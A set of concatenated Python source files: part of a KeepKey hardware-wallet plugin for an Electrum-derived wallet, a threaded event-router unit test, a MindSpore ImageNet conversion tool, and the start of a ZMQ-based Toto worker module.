raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
@runs_in_hwd_thread
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
@runs_in_hwd_thread
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
@runs_in_hwd_thread
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "UraniumX"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
TestEventRouterThreaded.py | # Copyright L.P.Klyne 2013
# Licenced under 3 clause BSD licence
# $Id: TestEventRouterThreaded.py 2612 2008-08-11 20:08:49Z graham.klyne $
#
# Unit testing for threaded event router functions
#
# This TestEventRouter as a base class, but substututes setUp and
# tearDown functions to use the EventRouterThreaded class, and adds
# some text cases to confirm expected multithreading behaviour.
#
import sys
import unittest
import logging
import time
from Queue import Queue
from threading import Thread
sys.path.append("../..")
from MiscLib.Functions import compareLists
from MiscLib.Logging import Trace, Info
from EventLib.Event import Event, makeEvent
from EventLib.Status import Status, StatusVal
from EventLib.SyncDeferred import makeDeferred
from EventLib.EventAgent import EventAgent, makeEventAgent
from EventLib.EventHandler import EventHandler, makeEventHandler
from EventLib.EventRouterThreaded import EventRouterThreaded
from TestEventRouter import TestEventRouter
# Event handler functions
# These simply store values in the event handler object that
# can be observed later
def subHandler(h,sts):
Trace("%s subHandler %s"%(h,str(sts)), "EventLib.TestEventRouterThreaded")
h.subcount += 1
h.dosub = sts
return
def unsubHandler(h,sts):
Trace("%s unsubHandler %s"%(h,str(sts)), "EventLib.TestEventRouterThreaded")
h.subcount -= 1
h.unsub = sts
return
def eventHandler(h,e):
Trace("%s eventHandler %s"%(h,str(e)), "EventLib.TestEventRouterThreaded")
h.evcount += 1
h.event = e
return makeDeferred(StatusVal.OK)
def eventHandlerBlocking(h,e):
Trace("%s eventHandlerBlocking %s"%(h,str(e)), "EventLib.TestEventRouterThreaded")
time.sleep(1.0)
h.evcount += 1
h.event = e
Trace("%s eventHandlerBlocking - return"%(h), "EventLib.TestEventRouterThreaded")
return makeDeferred(StatusVal.OK)
def eventHandlerQueueing(h,e):
Trace("%s eventHandlerQueueing %s"%(h,str(e)), "EventLib.TestEventRouterThreaded")
h.evcount += 1
h.event = e
h.queue.append(e)
return makeDeferred(StatusVal.OK)
# Test class
class TestEventRouterThreaded(TestEventRouter):
def setUp(self):
self.R1 = EventRouterThreaded("R1")
self.R2 = EventRouterThreaded("R2")
self.R3 = EventRouterThreaded("R3")
# Configure event routers with R1 as hub:
#
# R1
# / \
# R2 R3
#
# Wildcard event source
self.R1.routeEventFrom(evtype="R2Events/ev1",router=self.R2)
self.R1.routeEventFrom(evtype="R3Events/ev1",router=self.R3)
self.R2.routeEventFrom(evtype="R1Events/ev1",router=self.R1)
self.R2.routeEventFrom(evtype="R3Events/ev1",router=self.R1)
self.R3.routeEventFrom(evtype="R1Events/ev1",router=self.R1)
self.R3.routeEventFrom(evtype="R2Events/ev1",router=self.R1)
# Wildcard event type
self.R1.routeEventFrom(source="R2Source/src1",router=self.R2)
self.R1.routeEventFrom(source="R3Source/src1",router=self.R3)
self.R2.routeEventFrom(source="R1Source/src1",router=self.R1)
self.R2.routeEventFrom(source="R3Source/src1",router=self.R1)
self.R3.routeEventFrom(source="R1Source/src1",router=self.R1)
self.R3.routeEventFrom(source="R2Source/src1",router=self.R1)
# Wildcard none
self.R1.routeEventFrom(evtype="R2Events1/ev1",source="R2Source1/src1",router=self.R2)
self.R1.routeEventFrom(evtype="R3Events1/ev1",source="R3Source1/src1",router=self.R3)
self.R2.routeEventFrom(evtype="R1Events1/ev1",source="R1Source1/src1",router=self.R1)
self.R2.routeEventFrom(evtype="R3Events1/ev1",source="R3Source1/src1",router=self.R1)
self.R3.routeEventFrom(evtype="R1Events1/ev1",source="R1Source1/src1",router=self.R1)
self.R3.routeEventFrom(evtype="R2Events1/ev1",source="R2Source1/src1",router=self.R1)
# Cross routing event
self.R1.routeEventFrom(evtype="RREvents2/ev1",source="RRSource2/src1",router=self.R2)
self.R2.routeEventFrom(evtype="RREvents2/ev1",source="RRSource2/src1",router=self.R1)
# 3-way loop routing event
self.R1.routeEventFrom(evtype="RREvents3/ev1",source="RRSource3/src1",router=self.R2)
self.R2.routeEventFrom(evtype="RREvents3/ev1",source="RRSource3/src1",router=self.R3)
self.R3.routeEventFrom(evtype="RREvents3/ev1",source="RRSource3/src1",router=self.R1)
return
def tearDown(self):
self.R1.close()
self.R2.close()
self.R3.close()
return
# Test support functions
# One-hop routing test: R1 -> R2
def doSubscriptionForwardingR1R2(self, evtype, source, evmatch, evdrop, r1fwd=0):
self.doSubscriptionForwarding(self.R1, self.R2, evtype, source, evmatch, evdrop,
r1fwd=r1fwd, delay=0.1)
return
# Two-hop routing test: R2 -> R3 (via R3 - see method setUp)
def doSubscriptionForwardingR2R3(self, evtype, source, evmatch, evdrop, r1fwd=0):
self.doSubscriptionForwarding(self.R2, self.R3, evtype, source, evmatch, evdrop,
r1fwd=r1fwd, rvia=self.R1, delay=0.1)
return
# Test cases
# Test behaviour of blocking in event delivery
def testBlockingEventDelivery(self):
es = makeEventAgent(uri="es")
eh = makeEventHandler(
uri="eh", handler=eventHandlerBlocking,
initSubscription=subHandler, endSubscription=unsubHandler)
eh.subcount = 0
eh.evcount = 0
evtyp = "R3Events1/ev1" # Select event routed R3 -> R1 -> R2 ..
evsrc = "R3Source1/src1" # .. (see setUp)
ev = makeEvent(evtype=evtyp, source=evsrc)
sts = self.R2.subscribe(60, eh, evtype=evtyp, source=evsrc)
Trace("Subscribe returned", "EventLib.TestEventRouterThreaded")
time.sleep(0.1) # Allow subscribe time to propagate
Trace("Subscribed", "EventLib.TestEventRouterThreaded")
self.assertEqual(eh.evcount, 0)
sts = self.R3.publish(es, ev)
self.assertEqual(eh.evcount, 0) # Not delivered immediately ...
Trace("Before sleep", "EventLib.TestEventRouterThreaded")
time.sleep(1.5) # Note: evcent handler blocks for 1 sec
Trace("After sleep: eh.evcount %d"%(eh.evcount), "EventLib.TestEventRouterThreaded")
self.assertEqual(eh.evcount, 1) # ... but sometime after a second
self.assertEqual(eh.event.getType(), evtyp)
self.assertEqual(eh.event.getSource(), evsrc)
Trace("testBlockingEventDelivery OK", "EventLib.TestEventRouterThreaded")
return
# Test event publication by two concurrent threads
def testInterleavedEventDelivery(self):
# Helpers
def makePublishThread( es, cq, wait0, wait1, evlist):
t = Thread(name=es, target=publishFromThread, args=(es, cq, wait0, wait1, evlist))
t.start()
return
def publishFromThread( es, cq, wait0, wait1, evlist):
n = 0
for (et,es) in evlist:
n += 1
time.sleep(wait0)
wait0 = wait1
ev = makeEvent(evtype=et, source=es)
sts = self.R3.publish(es, ev)
cq.put(n)
return
# Main test case
evtyp = "R3Events/ev1" # Select event type routed R3 -> R1 -> R2
eh = makeEventHandler(
uri="eh", handler=eventHandlerQueueing,
initSubscription=subHandler, endSubscription=unsubHandler)
eh.subcount = 0
eh.evcount = 0
eh.event = None
eh.queue = []
self.R2.subscribe(60, eh, evtype=evtyp, source=None)
time.sleep(0.1) # Allow subscribe time to propagate
completionQueue = Queue()
makePublishThread( "es1", completionQueue, 0.0, 1.0, ((evtyp,"Pub11"),(evtyp,"Pub12")) )
makePublishThread( "es2", completionQueue, 0.5, 1.0, ((evtyp,"Pub21"),(evtyp,"Pub22")) )
c = completionQueue.get() # Wait for both threads to complete
c = completionQueue.get()
# Check state of handler
time.sleep(0.1) # Allow events time to propagate
self.assertEqual(eh.evcount, 4)
self.assertEqual(eh.queue[0].getType(), evtyp)
self.assertEqual(eh.queue[0].getSource(), "Pub11")
self.assertEqual(eh.queue[1].getType(), evtyp)
self.assertEqual(eh.queue[1].getSource(), "Pub21")
self.assertEqual(eh.queue[2].getType(), evtyp)
self.assertEqual(eh.queue[2].getSource(), "Pub12")
self.assertEqual(eh.queue[3].getType(), evtyp)
self.assertEqual(eh.queue[3].getSource(), "Pub22")
return
# Test behaviour of watching an event subscription
def testWatch(self):
es = makeEventAgent(uri="es")
eh1 = makeEventHandler(
uri="eh1", handler=eventHandlerBlocking,
initSubscription=subHandler, endSubscription=unsubHandler)
eh2 = makeEventHandler(
uri="eh2", handler=eventHandlerBlocking,
initSubscription=subHandler, endSubscription=unsubHandler)
eh3 = makeEventHandler(
uri="eh3", handler=eventHandlerBlocking,
initSubscription=subHandler, endSubscription=unsubHandler)
eh1.subcount = 0
eh1.evcount = 0
eh2.subcount = 0
eh2.evcount = 0
eh3.subcount = 0
eh3.evcount = 0
self.R1.subscribe( 30, eh3, '' )
self.R1.watch( 30, eh1, 'http://id.webbrick.co.uk/events/config/get' )
# self.R1.subscribe( 30, eh1, 'http://id.webbrick.co.uk/events/config/set' )
# self.R1.subscribe( 30, eh2, 'http://id.webbrick.co.uk/events/time/minute' )
self.R1.subscribe( 30, eh2, 'http://id.webbrick.co.uk/events/config/get' )
self.R1.unsubscribe( eh3, '' )
self.R1.endWatch( eh1, 'http://id.webbrick.co.uk/events/config/get' )
# self.R1.unsubscribe( eh1, 'http://id.webbrick.co.uk/events/config/set' )
# self.R1.unsubscribe( eh2, 'http://id.webbrick.co.uk/events/time/minute' )
self.R1.unsubscribe( eh2, 'http://id.webbrick.co.uk/events/config/get' )
self.assertEqual(eh1.subcount, 0)
self.assertEqual(eh2.subcount, 0)
self.assertEqual(eh3.subcount, 0)
time.sleep(1.5) # Note: evcent handler blocks for 1 sec
return
def testShutdown(self):
# ensure test harness shutsdown if no close called
Rlocal = EventRouterThreaded("Rlocal")
assert (True)
def testUnits(self):
assert (True)
def testComponents(self):
assert (True)
def testIntegration(self):
assert (True)
# Assemble test suite
from MiscLib import TestUtils
def getTestSuite(select="unit"):
"""
Get test suite
select is one of the following:
"unit" return suite of unit tests only
"component" return suite of unit and component tests
"all" return suite of unit, component and integration tests
"pending" return suite of pending tests
name a single named test to be run
"""
testdict = {
"unit":
[ "testUnits"
, "testShutdown"
, "testSubscriptionRouteTable"
, "testSubscriptionForwarding1"
, "testSubscriptionForwarding2"
, "testSubscriptionForwarding3"
, "testSubscriptionForwarding4"
, "testSubscriptionForwarding5"
, "testSubscriptionForwarding6"
, "testSubscriptionForwarding7"
, "testSubscriptionForwarding8"
, "testBlockingEventDelivery"
, "testInterleavedEventDelivery"
],
"component":
[ "testComponents"
],
"integration":
[ "testIntegration"
],
"pending":
[ "testPending"
, "testWatch"
]
}
return TestUtils.getTestSuite(TestEventRouterThreaded, testdict, select=select)
# Run unit tests directly from command line
if __name__ == "__main__":
TestUtils.runTests("TestEventRouterThreaded.log", getTestSuite, sys.argv)
# End.
|
imagenet_to_mr.py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Imagenet convert tool for MindRecord.
"""
import os
import time
from mindspore import log as logger
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread
__all__ = ['ImageNetToMR']
class ImageNetToMR:
"""
A class to transform from imagenet to MindRecord.
Args:
map_file (str): the map file that indicates label. The map file content should be like this:
.. code-block::
n02119789 0
n02100735 1
n02110185 2
n02096294 3
image_dir (str): image directory contains n02119789, n02100735, n02110185 and n02096294 directory.
destination (str): the MindRecord file path to transform into.
partition_number (int, optional): partition size. Default: 1.
Raises:
ValueError: If `map_file`, `image_dir` or `destination` is invalid.
"""
def __init__(self, map_file, image_dir, destination, partition_number=1):
check_filename(map_file)
self.map_file = map_file
check_filename(image_dir)
self.image_dir = image_dir
check_filename(destination)
self.destination = destination
if partition_number is not None:
if not isinstance(partition_number, int):
raise ValueError("The parameter partition_number must be int")
self.partition_number = partition_number
else:
raise ValueError("The parameter partition_number must be int")
self.writer = FileWriter(self.destination, self.partition_number)
def _get_imagenet_as_dict(self):
"""
Get data from imagenet as dict.
Yields:
data (dict of list): imagenet data list which contains dict.
"""
real_file_path = os.path.realpath(self.map_file)
if not os.path.exists(real_file_path):
raise IOError("map file {} not exists".format(self.map_file))
label_dict = {}
with open(real_file_path) as fp:
line = fp.readline()
while line:
labels = line.split(" ")
label_dict[labels[1]] = labels[0]
line = fp.readline()
# get all the dir which are n02087046, n02094114, n02109525
dir_paths = {}
for item in label_dict:
real_path = os.path.join(self.image_dir, label_dict[item])
if not os.path.isdir(real_path):
logger.warning("{} dir is not exist".format(real_path))
continue
dir_paths[item] = real_path
if not dir_paths:
raise PathNotExistsError("not valid image dir in {}".format(self.image_dir))
# get the filename, label and image binary as a dict
for label in dir_paths:
for item in os.listdir(dir_paths[label]):
file_name = os.path.join(dir_paths[label], item)
if not item.endswith("JPEG") and not item.endswith("jpg"):
logger.warning("{} file is not suffix with JPEG/jpg, skip it.".format(file_name))
continue
data = {}
data["file_name"] = str(file_name)
data["label"] = int(label)
# get the image data
real_file_path = os.path.realpath(file_name)
image_file = open(real_file_path, "rb")
image_bytes = image_file.read()
image_file.close()
if not image_bytes:
logger.warning("The image file: {} is invalid.".format(file_name))
continue
data["image"] = image_bytes
yield data
def run(self):
"""
Execute transformation from imagenet to MindRecord.
Returns:
MSRStatus, whether imagenet is successfully transformed to MindRecord.
"""
t0_total = time.time()
imagenet_schema_json = {"label": {"type": "int32"},
"image": {"type": "bytes"},
"file_name": {"type": "string"}}
logger.info("transformed MindRecord schema is: {}".format(imagenet_schema_json))
# set the header size
self.writer.set_header_size(1 << 24)
# set the page size
self.writer.set_page_size(1 << 26)
# create the schema
self.writer.add_schema(imagenet_schema_json, "imagenet_schema")
# add the index
self.writer.add_index(["label", "file_name"])
imagenet_iter = self._get_imagenet_as_dict()
batch_size = 256
transform_count = 0
while True:
data_list = []
try:
for _ in range(batch_size):
data_list.append(imagenet_iter.__next__())
transform_count += 1
self.writer.write_raw_data(data_list)
logger.info("transformed {} record...".format(transform_count))
except StopIteration:
if data_list:
self.writer.write_raw_data(data_list)
logger.info("transformed {} record...".format(transform_count))
break
ret = self.writer.commit()
t1_total = time.time()
logger.info("--------------------------------------------")
logger.info("END. Total time: {}".format(t1_total - t0_total))
logger.info("--------------------------------------------")
return ret
def transform(self):
"""
Encapsulate the run function to exit normally
"""
t = ExceptionThread(target=self.run)
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
|
worker.py | '''The Toto worker and worker connection classes are designed to help build RPC systems,
allowing you to pass CPU intensive work to other processeses or machines. Workers
were originally designed for use with the Toto server, making it easy to perform
long running tasks without effecting the server's responsiveness, but they have been
designed to be used independently and have no direct ties to the web server
architecture.
``TotoWorkers`` and ``WorkerConnections`` use ZMQ for messaging and require the ``pyzmq`` module.
The ``TotoWorkerService`` has a built in message router that will round-robin balance incoming
messages. The router can be disabled through configuration if only one worker process is needed.
Alternatively, the router can be configured to run without any worker processes, allowing multiple
machines to share a common router.
Most of the time you'll only need this script to start your server::
from toto.worker import TotoWorkerService
TotoWorkerService('settings.conf').run()
Methods, startup functions and databases can all be configured with the conf file.
Run your startup script with --help to see all available options.
'''
import os
import zmq
from zmq.devices.basedevice import ProcessDevice
import tornado
from tornado.options import options
import logging
import zlib
import cPickle as pickle
import sys
import time
from threading import Thread
from multiprocessing import Process, cpu_count
from toto.service import TotoService, process_count, pid_path
from toto.dbconnection import configured_connection
from exceptions import *
from toto.options import safe_define
safe_define("method_module", default='methods', help="The root module to use for method lookup")
safe_define("remote_event_receivers", type=str, help="A comma separated list of remote event address that this event manager should connect to. e.g.: 'tcp://192.168.1.2:8889'", multiple=True)
safe_define("event_init_module", default=None, type=str, help="If defined, this module's 'invoke' function will be called with the EventManager instance after the main event handler is registered (e.g.: myevents.setup)")
safe_define("startup_function", default=None, type=str, help="An optional function to run on startup - e.g. module.function. The function will be called for each worker process after it is configured and before it starts listening for tasks with the named parameters worker and db_connection.")
safe_define("worker_bind_address", default="tcp://*:55555", help="The service will bind to this address with a zmq PULL socket and listen for incoming tasks. Tasks will be load balanced to all workers. If this is set to an empty string, workers will connect directly to worker_socket_address.")
safe_define("worker_socket_address", default="ipc:///tmp/workerservice.sock", help="The load balancer will use this address to coordinate tasks between local workers")
safe_define("control_socket_address", default="ipc:///tmp/workercontrol.sock", help="Workers will subscribe to messages on this socket and listen for control commands. If this is an empty string, the command option will have no effect")
safe_define("command", type=str, metavar='status|shutdown', help="Specify a command to send to running workers on the control socket")
safe_define("compression_module", type=str, help="The module to use for compressing and decompressing messages. The module must have 'decompress' and 'compress' methods. If not specified, no compression will be used. You can also set worker.compress and worker.decompress in your startup method for increased flexibility")
safe_define("serialization_module", type=str, help="The module to use for serializing and deserializing messages. The module must have 'dumps' and 'loads' methods. If not specified, cPickle will be used. You can also set worker.dumps and worker.loads in your startup method for increased flexibility")
class TotoWorkerService(TotoService):
'''Instances can be configured in three ways:
1. (Most common) Pass the path to a config file as the first parameter to the constructor.
2. Pass config parameters as command line arguments to the initialization script.
3. Pass keyword arguments to the constructor.
Precidence is as follows:
Keyword args, config file, command line
'''
